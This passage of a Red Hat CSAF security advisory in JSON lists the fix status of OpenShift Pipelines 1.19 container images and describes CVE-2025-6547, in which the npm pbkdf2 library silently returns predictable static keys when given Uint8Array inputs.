"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pbkdf2: pbkdf2 silently returns predictable key material"
},
{
"cve": "CVE-2025-6547",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2025-06-23T20:01:13.559691+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2374378"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the npm pbkdf2 library, allowing signature spoofing. Under specific use cases, pbkdf2 may return static keys. This issue only occurs when running the library on Node.js.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pbkdf2: pbkdf2 silently returns static keys",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated as an Important severity because a logic flaw was found in the npm pbkdf2 library where the vulnerability, located in the toBuffer method, causes password and salt inputs provided as Uint8Array objects to be silently ignored. This results in the function returning a static, predictable key derived from empty inputs, completely undermining the security guarantees of any feature that relies on the generated key, this allows an attacker to forge signatures, leading to a complete compromise of the application\u0027s data confidentiality, integrity, and availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64"
],
"known_not_affected": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
